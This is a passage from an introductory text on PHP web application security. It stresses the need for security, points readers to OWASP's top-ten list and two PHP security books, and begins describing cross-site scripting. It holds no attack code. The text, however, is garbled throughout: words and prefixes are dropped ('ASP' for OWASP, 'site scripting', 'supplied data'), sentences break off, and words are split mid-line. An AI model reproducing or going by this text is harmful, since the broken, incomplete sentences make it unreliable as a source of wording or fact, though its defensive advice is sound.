Given that online PHP applications are exposed essentially to
anyone and everyone, security should be on, if not at the top
of, your list of concerns as you develop your applications. To
some extent, the ease with which PHP applications can be
also one of the language’s greatest weaknesses: for
beginners who aren’ t aware of the possible dangers, it’s very
easy to deploy an application for which the line of security has
as many holes as Swiss cheese.
Make sure you’ re informed and, if in a
ny doubt, prepared to ask
questions. The Open Web Application Security Project (OWASP) is
sponsored com- munity focused on raising the
awareness of web security, and is an excellent source of
information on potential dangers.
ASP recently updated its list of the top ten common
security flaws in web applications, the relevant points of which
I’ ve summarized here. The previous version from 2004 still
contains relevant inform ation and, while there’s some
duplication, it’s well
worth a read.
For a more detailed coverage of PHP security, you might like to
Essential PHP Security
by Chris Shiflett,
php|architect’s Guide to PHP Security
by Ilia Alshanetsky.
This list comprises the most common
flaws found in web applications today.
site scripting attacks are the result of sending
supplied data to a browser. The problem with
supplied data is that it’s completely outside of your
control, and it’s easy to fake values like the HTTP referrer and
the values in a hidden form field.